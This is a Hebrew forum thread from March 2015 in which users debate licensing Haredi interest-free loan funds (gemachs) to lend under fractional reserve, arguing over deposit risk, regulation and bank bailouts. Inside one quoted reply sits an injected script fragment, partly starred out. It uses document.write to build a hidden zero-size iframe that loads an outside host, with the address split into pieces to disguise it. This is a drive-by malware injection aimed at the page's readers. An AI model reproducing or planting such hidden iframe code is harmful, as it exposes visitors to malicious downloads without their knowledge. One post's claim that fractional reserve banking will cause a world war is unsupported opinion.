| נשלח ב-19/3/2015 21:29 |
|
| |
גמ"חים ברזרבה חלקית.
גמ"חים ברזרבה חלקית (כל מה שאני הולך לכתוב כאן לא בא כי אני מסכים לנוכלות הבנקאית והמשטרים מעצם המצאת בנקאות ברזרבה חלקית, כידוע לכם אין עוול ציבורי חברתי בכל ימי האנושות מהעוול הזו ודיברנו על כך בכל הזדמנות. אבל כל זמן שהשיטה קיימת, אני חושב שהדרישה חייבת להיות דרישה חרדית כתנאי ראשוני בשותפות הקואליציוני.) גמ"חים ברזרבה חלקית היום ביקש ממני רב חרדי ערבות לגמ"ח. למי שלא יודע אצל החרדים יש גמ"חים לכסף בלי ריבית ועם תשלומים. כלומר אפשר למשל לקבל הלוואה של ארבעים אלף ש"ח על פריסה תשלומים של 1000\500 ש"ח לחודש. או סכום כסף בתשלום יחיד בעוד שנה או פחות או יותר, בקיצור הכל תלוי בגמ"ח ומגבלותיו, כלומר יש אלפי סוגי גמ"חים במגזרים השונים של החרדים. התברר שהרב ביקש סכום גדול והגמ"ח לא אישר לו רק חצי מהסכום, ואני שאלתי אותו למה לא אישרו לך את הסכום ? זה הסכום המקסימלי שהגמ"ח נותן, עונה הרב. אני מנסה לעזור לו ומתקשר לבעל הגמ"ח ושואל למה לא לאשר לרב את הסכום שביקש ? בעל הגמ"ח: זה הסכום שאנו נותנים הרי צריכים לתת לעוד אנשים. אני: אבל הרב צריך את הכסף מה ואייך אפשר לעזור לו ? בעל הגמ"ח: יש עוד גמ"חים בעיר !! או תשכנע את בעלי הפיקדונות להכניס יותר כספים לגמ"ח. ואז נזכרתי בבנקאות ברזרבה חלקית, וחשבתי שזאת עוול חברתית נורא שאין כדוגמתה. יש אנשים טובים בחברה שמגייסים בהתנדבות פיקדונות מאנשים טובים, ומלווים לכל אדם סכומים דיי גדולים עם פריסת תשלומים נוחים בלי ריבית. אבל והיות שהפיקדונות בכל גמ"ח הם סופיים\מוגבלים = 100% רזרבה, יוצא שאדם צריך סכום גדול הוא צריך ללכת לכמה גמ"חים ואז ההחזר החודשי גבוה מאוד. נגיד למשל שהוא צריך מאה עשרים אלף שקל, והוא צריך לפחות שלוש או ארבע גמ"חים שלכל גמ"ח הוא חייב לשלם החזר חודשי של כאלף שקל = שלוש\ארבע אלף שקל לחודש. אבל אם הגמ"חים יקבלו רישיון כמו הבנקים המנוולים להלוות ברזרבה חלקית, אז כל גמ"ח יוכל להדפיס כסף בדיוק כמו הבנקים, כלומר כל גמ"ח יוכל להלוות סכומים גדולים מאוד עם פריסת תשלומים רחבה מאוד. אני חושב שהחברה והמדינה חייבת לתת לגמ"חים האלה את הרישיון הזה (כמובן בפיקוח בנק ישראל שצריך לשמור על כמות הכסף וכו' וכו'). אם הבנקים עושים את זה בשביל רווחים פרטיים, אז קל וחומר שהחברה\הציבור\המדינה צריכה לתת לגמ"חים את הרישיון הזה. הרי מה הייחוס של הבנקים מול הצדיקים האלה ? אני חושב שיש לגמ"חים קדימות לפני הבנקים. אני גם חושב שזה יביא את תופעת הגמ"חים גם לכלל הציבור, ואז נהיה חברה מושלמת וצדיקה. לסיכום: אנחנו כחברה חייבים לדרוש רישיון מבנק ישראל בשביל הגמ"חים האלה שכל מטרתם היא עזרה הדדית ועזרה לזולת בהתנדבות. מבחינת חברתית זאת תהיה ממש אור לגויים, וכבוד גדול לחברה שלנו. אני אפי' ממליץ ללכת עם הדבר הזה לבג"ץ, אולי הישועה תבוא מהם. נ.ב. שוב, כל זה לא בא להצדיק את העוול של בנקאות ברזרבה חלקית שזה מה שתביא את מלחמת העולם השלישית ח"ו, כי היא הגורם המזרז (במאות אחוזים יותר מהרגיל בימי קדם) את התכנסות ההון אצל יחידים והופכת את כל בני אנוש לעבדים ליחידים כמו אצל פרעה ויוסף במצרים. בברכה Max maxmen
 |
|
|
|
|
| נשלח ב-20/3/2015 06:56 |
|
| |
מקסמן
מה זה "ברזרבה חלקית"?
|
|
|
| נשלח ב-20/3/2015 09:48 |
|
| |
גם כיום המצב בעייתי. לגמ"ח יש פקדונות בסכום של חצי מיליון (נניח). והוא חילק הלוואות בסכום של חצי מיליון. הרי תמיד יש אחוז מסויים (בהערכה גסה כ-3-4 אחוז) שלא מחזיר. מסיבות של מירמה או של חוסר יכולת. אם הגמ"ח עובד רק על פקדונות הוא בבעיה. אבל נניח ש 5 אחוז מהכסף בגמח הוא לא פקדונות אלא תרומות. אז איכשהוא זה בסדר.
אבל מה יקרה אם בעקבות משבר כלכלי רציני אחוז הלא מחזירים יעלה ל-20 אחוז? בעלי הפקדונות יכולים לשכוח לפחות מחלק מפקדונותיהם.
ההצעה שלך אומרת - בואו נחמיר את המצב.
אמנם בבנקים הבעיה דומה, אבל שם הרגולציה חמורה בהרבה.
|
|
|
|
| נשלח ב-20/3/2015 12:46 |
|
| |
| מאירקה99 כתב: |  | אמנם בבנקים הבעיה דומה, אבל שם הרגולציה חמורה בהרבה.
|
|
ולכן אמרתי עם פיקוח בנק ישראל.
|
|
|
|
| נשלח ב-20/3/2015 13:06 |
|
| |
| מיימוני כתב: |  | מקסמן
מה זה "ברזרבה חלקית"?< type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");> |
|
שלום רב הרב מיימוני היקר.
רזרבה = פיקדונות בכספת. גמ"חים מלווים רק מה שיש בכספת = 100% רזרבה. הבנקים מלווים על כל שקל בפיקדונות, כתשע שקלים = רזרבה חלקית. ולא רק זה, האדם שלוקח הלוואה מהבנק, הוא מכניס את ההלוואה לבנק שוב (בחשבון שלו או משלם למישהו שההוא מכניס אותו לחשבון שלו) ואז יש כבר לבנק עוד פיקדונות שאליו שוב הוא מלווה תשע שקלים על כל שקל. וכן חוזר חלילה וחלילה.
יש אשכול כבד מאוד בפורום (אחד האשכולות שנותנת גאווה לפורום) בעניין. הדפסת כסף מאת: אראלסגל היקר
|
|
|
|
| נשלח ב-20/3/2015 13:20 |
|
| |
נניח שגמ"ח נפתח עכשיו ומקבל פקדונות ב-500,000 ש"ח במזומן. ההלוואה שלו היא במזומן, ולכן לגמ"ח לא יישאר מה להלוות לאחרים. לעומת זאת, הבנק מלווה את הכסף, אבל המזומן נשאר אצלו כי הלווה מפקיד את הכסף (גם אם הלווה הזה לוקח את הכסף לבנק אחר או משלם אותו למישהו שנמצא בבנק אחר, הרי שיש לקוחות שלווים בבנקים אחרים ומפקידים אצלו). אם אתה רוצה שזה יקרה גם בגמ"חים חרדים תצטרך שהגמ"חים האלה לא יקבלו רק פיקדונות של אנשים ששמים שם כסף במקום לחסוך, אלא גם פיקדונות שיתפקדו ממש כמו חשבון עו"ש, ויהיה אפשר לשלם איתם - בצ'קים ובכרטיס תשלום (גם אם לא אשראי אז דיירקט). בעצם יהיה מדובר בבנק שמלווה לנזקקים ללא ריבית, ללא רווחים ועם הפסדים (של מי שלא מחזיר). במצב כזה למפקידים לא יהיה אמון בבנק (כי הם יודעים שהוא כל הזמן מפסיד ובסוף הכסף שלהם ירד לטמיון), והבנק יפול. בגלל זה בנק ישראל לא יאשר זאת. בקיצור, במודל כזה תצטרך הרבה הרבה יותר תרומות, שגם כיום לא מספיקות. גם במצב כיום הגמ"חים האלה מאוד בעיתיים כי הם מפסידים, והם יכולים לחיות רק אם הם מקבלים מספיק תרומות. מהסיבה הזו רוצים שתהיה עליהם רגולציה (חוק הגמחים). העובדה היא שדווקא ראשי הגמ"חים והח"כים החרדים מפחדים מרגולציה כזו.
 |
|
|
|
|
| נשלח ב-20/3/2015 13:39 |
|
| |
| יש3 כתב: |  | |
|
1, כל הגמ"חים הגדולים פועלים בבנקים כלומר אין להם כספת ומזומנים (אחרי החוק שמגביל את המזומנים לשבע אלף שקל, אפי' הגמחים הקטנים יצטרכו לעבוד עם הבנקים) הכל מתנהל בבנקים ולכן אני לא רואה שום הבדל ביניהם. (שאתה מקבל אישור הלוואה, הגמ"ח שולח אותו אוטומטית מהחשבון של הגמ"ח לחשבון שלך דרך הבנקים וככה אתה ממשיך לעשות הכל עם הבנק שלך ומעביר לחשבון של הקבלן שלך וכו' וכו')
2, אני לא חושב שזה עניין חרדי, אני חושב (וציינתי את זה לעיל) שאם זה יצליח, אז יש מספיק אנשים טובים שיפתחו כאלה גמחים בציבור הכללי.
3, כל הסכנות קיימות גם בבנקים ועובדה שנפתחות גמ"ח חדשים בכל יום והגמחים הגדולים גדילים בכל יום. אני לא רוצה לדבר בלי כיסוי אבל מדובר במאות אלפי מיליונים. ולכן אם המפקידים (שחלק מהם גם חילוניים ולאו דווקא חרדים) לגמ"חים לא מפחדים, אז אין סיבה לכלל הציבור לפחד להפקיד את כספת בגמחים חילוניים.
תוקן על ידי maxmen ב- 20/03/2015 13:41:24
|
|
|
|
| נשלח ב-20/3/2015 13:48 |
|
| |
1. הכסף יורד מהחשבון של הגמ"ח - זו בדיוק הנקודה. לגמ"ח אין חשבון בלתי מוגבל. כדי שהוא יוכל לייצר כסף הוא צריך שלו עצמו תהיה יכולת לנהל פיקדונות של אנשים אחרים ולהיות כמו בנק. 3. הבנקים מרוויחים המון כסף והם גובים בצורה יחסית יעילה. לכן הסכנה שהבנק יפשוט את הרגל ולא יוכל להחזיר פיקדונות היא פחותה. דומני שזה לא דבר נדיר שגמ"ח לא מצליח להחזיר פיקדון כשמבקשים ממנו, אבל זה רק רושם שלא נסמך על שום ידיעה.
|
|
|
|
| נשלח ב-20/3/2015 14:37 |
|
| |
| יש3 כתב: |  | 1. הכסף יורד מהחשבון של הגמ"ח - זו בדיוק הנקודה. לגמ"ח אין חשבון בלתי מוגבל. כדי שהוא יוכל לייצר כסף הוא צריך שלו עצמו תהיה יכולת לנהל פיקדונות של אנשים אחרים ולהיות כמו בנק. 3. הבנקים מרוויחים המון כסף והם גובים בצורה יחסית יעילה. לכן הסכנה שהבנק יפשוט את הרגל ולא יוכל להחזיר פיקדונות היא פחותה. דומני שזה לא דבר נדיר שגמ"ח לא מצליח להחזיר פיקדון כשמבקשים ממנו, אבל זה רק רושם שלא נסמך על שום ידיעה. |
|
לציבור החרדי יש ניסיון מר עם הבנקים (בנק ארץ ישראל בריטניה ועוד) ועם כל סוגי ההשקעות. מצד שני כמעט אם בכלל לא שמענו דברים מסוגים כאלה לגבי גמחים.
אבל אין צורך לדבר על סכנה שהיא אותו סכנה לשניהם בכל מקרה. צריך לדון על העיקרון, למה שהגמחים לא ידפיסו כסף כמו הבנקים עם פיקוח ? ושוב אני לא מצדיק את הדבר אבל כאמור עצם שהיא קיימת וכל זמן שהיא קיימת אין שום סיבה רצינית לא לתת להם לעשות את זה מה עוד שזה יכול להצמיח את הכלכלה ביתר שאת. הרי החשיבה (ההצדקה) של השיטה טוענת שהאשראי הוא המצמיח את הכלכלה המודרנית. הנה אתמול הנגידה של בנק ישראל מגדילה את כמות הכסף וריבית שלילית, כל זה כדרבון להצמיח את המשק. הגמחים יכולים להיות חלק בזה. http://www.globes.co.il/news/article.aspx?did=1001019981
תוקן על ידי maxmen ב- 20/03/2015 14:46:16
|
|
|
|
| נשלח ב-20/3/2015 14:50 |
|
| |
מי שרוצה להבין מהי משמעות של המשפט "הקלה כמותית" ?! הנה סרטון נחמד שמסביר את זה בטוב טעם.
|
|
|
|
| נשלח ב-21/3/2015 19:59 |
|
| |
בפעם האחרונה אני אחזור על עצמי: כידוע לך, הבנקים לא מדפיסים כסף, אלא 'ייצור' הכסף שלהם נעשה באמצעות הלוואת אותו כסף שוב ושוב. בשביל זה הם צריכים לנהל פיקדונות עו"ש. כל אחד יכול לפתוח בנק ולעשות זאת, גם אם יקראו לו בנק גמ"ח, והוא יצטרך לעמוד ברגולציה של בנק ישראל, וזו כמובן משימה לא פשוטה. זו משימה לא פשוטה כיוון שבנק ישראל ערב לפיקדונות, ואתה לא יכול לצפות שהוא יערוב לפיקדונות בבנק שהסיכוי שלו להתמוטט גבוה. מה שאתה אולי יכול לחשוב עליו זה שהמדינה צריכה לעזור להקמת בנקים כאלה גם אם יש בהם יותר סיכון בגלל התועלת החברתית שהם מביאים. בשביל זה אתה צריך להכין תוכנית מפורטת שתסביר איך זה יעבוד, מה אתה נותן ומה אתה מבקש מהמדינה, ולהתחיל בשתדלנות - לך בכוחך זה!
|
|
|
|
| נשלח ב-22/3/2015 01:33 |
|
| |
| יש3 כתב: |  | בפעם האחרונה אני אחזור על עצמי: כידוע לך, הבנקים לא מדפיסים כסף, אלא 'ייצור' הכסף שלהם נעשה באמצעות הלוואת אותו כסף שוב ושוב. בשביל זה הם צריכים לנהל פיקדונות עו"ש. כל אחד יכול לפתוח בנק ולעשות זאת, גם אם יקראו לו בנק גמ"ח, והוא יצטרך לעמוד ברגולציה של בנק ישראל, וזו כמובן משימה לא פשוטה. זו משימה לא פשוטה כיוון שבנק ישראל ערב לפיקדונות, ואתה לא יכול לצפות שהוא יערוב לפיקדונות בבנק שהסיכוי שלו להתמוטט גבוה. מה שאתה אולי יכול לחשוב עליו זה שהמדינה צריכה לעזור להקמת בנקים כאלה גם אם יש בהם יותר סיכון בגלל התועלת החברתית שהם מביאים. בשביל זה אתה צריך להכין תוכנית מפורטת שתסביר איך זה יעבוד, מה אתה נותן ומה אתה מבקש מהמדינה, ולהתחיל בשתדלנות - לך בכוחך זה! |
|
אהבתי את המשפט "בפעם האחרונה אני אחזור על עצמי" כאילו בזה המשפט מישהו מתרשם שאתה יודע על מה אתה שח.
1, כל יצירת הכסף היא על ידי הבנקים (המילה הדפסה היא לא מדוייקת כי כמה אחוזים בודדים מכל הכסף הם נייר, מדובר בכסף אלקטרוני. אבל זה אותו דבר).
2, בפיקדונות עו"ש אסור לבנק לגעת (= תקנת בנק ישראל אחרי המקרה של קפריסין, אבל אני חושב שזה בוטל כבר), וזאת הסיבה שפקידי הבנק רודפים כל בעל חשבון לעשות תוכנית ולא להשאיר כסף בעו"ש כי מבחינתם כל כסף בעו"ש לא שווה להם גרוש ולכן הם גם לא משלמים לך ריבית (רק שקלים בודדים) על כסף בעו"ש. (כל זה אם התקנה עוד לא בוטלה, וכמה שזכור לי זה בוטל על ידי הנגידה החדשה. לא בדקתי את זה עכשיו, אני כותב מהזיכרון)
3, המדינה ערב לפקדונות ?? הצחקת אותי !! פיקוח כן אבל ערב ?! בתח,,,,, !!! (נכון היה שהם יהיו ערבים לגבי עו"ש, כי החוק החדש שאוסר להחזיק מזומנים, כופה עלינו להחזיק את כספינו בכוח החוק (= כפיה) בבנק, ולכן מן הדין שהם יהיו ערבים באמת על עו"ש, אחרת באיזה זכות כופים עלינו להחזיק את כספינו בבנק ?? כלומר אוסרים להחזיק מזומנים ? וכופים לשלם עמלה ? כלומר אחרי החוק הזה המדינה כופה על אזרחיה להיות משועבדים לבנקים כאילו הם זרוע שלטוני בזמן שהם פרטיים לגמרי, זה כמו לכפות עלינו באיזה מסעדה לאכול ובאיזה חנות בגדים לקנות, ועוד לשלם לחנות עמלה)
4, שוב לא שמעתי ואתה גם לא שמעת על גמ"ח שפשט רגל. ואפי' אם תמצא לי כזה מקרה אז הבנקים באותו סיפור. רק מה, המנוולים מצילים את הבנקים כל פעם עם תירוץ שאם ניתן להם ליפול הרבה אזרחים יפסידו, אבל כל בר דעת יודע שכל חילוץ של בנק על ידי המדינה הוא על חשבון האזרחים. בארה"ב הצילו את הבנקים ומעשר נשארו חמש בנקים ששולטים בכל הכלכלה בהמשך יישאר בנק אחד כמו במצרים.
בכל אופן אני לא רואה שום סיבה למה שהגמ"חים לא יתנו הלוואות ברזרבה חלקית עם פיקוח כמובן. במיוחד עכשיו שבנק ישראל עושה הקלה כמותית, ועוד עוברים לריבית שלילית = גמ"ח.
|
|
|
|
| נשלח ב-22/3/2015 10:10 |
|
| |
לא ענית על מה שכתבתי. לא נורא.
|
|
|
|
| נשלח ב-22/3/2015 14:15 |
|
| |
מקס, הרעיון לא-רע. אני מצטרפת להסתייגויות של יש3, ומוסיפה משלי: אני לא רואה שום סיבה להעלות את כמות הכסף בשוק על ידי נתינת עוד הלוואות. בדרך כלל אנשים לוקחים מגמ"חים הלוואות, כי אין להם מספיק הכנסות. הפתרון הוא להגדיל הכנסות, ולא להגדיל את אפשרויות לקיחת ההלוואה. (ולא להתחייב בשידוכים על מה שאין לך לתת). (כמובן שאין המדובר על הוצאה רפואית חד פעמית, כמו ניתוח. בשביל זה בדיוק נועדו הגמ"חים הקיימים. אבל בשוטף, לקיחת הלוואות איננה פתרון לשום מצוקה כלכלית. ממילא, אין סיבה לעודד לקיחת הלוואות).
|
|
|
|
|
| נשלח ב-22/3/2015 14:19 |
|
| |
אז בואו נראה כמה כסף אבודים יש בבנקים מול הגמ"חים שזה כמעט אפס. בואו גם נראה מה פירוש מחיקת חובות לטייקונים וחנק לעסקים קטנים ופרטיים. בואו נראה כמה ריבית עסק פריטי חייב לשלם ריבית פיגורים מאתים אלף שקל תוך חצי שנה שבע מאות אלף שקל.
אז אם לאדם הזה היה לו אפשרות לקבל גמ"חים בלי ריבית ובלי חנק, אז אף אחד לא היה חונק אותו ולא היה גונב לו את הבית ולא היה משתלט על העסק שלו.
הנה כתבה בערוץ 10 שבא לנו למות רק מלראות את זה.
|
|
|
|
| נשלח ב-22/3/2015 14:31 |
|
| |
מקסמן, תתיחס בבקשה לטענות שלנו, לפני שאתה ממשיך הלאה. נניח שבעל עסק לקח מגמ"ח הלוואה של מאתיים אלף שקל. העסק קרס וההלוואה לא מוחזרת. מי יחזיר לגמ"ח את הכסף? (לפי שיטתך, אולי הגמ"ח ירשום כאילו הלווה כן החזיר, למרות שהוא לא החזיר. הרי ממילא לא מדובר בכסף ממשי, ומה לי רישום כזה או אחר. ומנהל הגמ"ח ימשיך להלוות שוב ושוב את אותם 200,000 ש"ח שלא יוחזרו לעולם, ובא לציון גואל).
|
|
|
|
|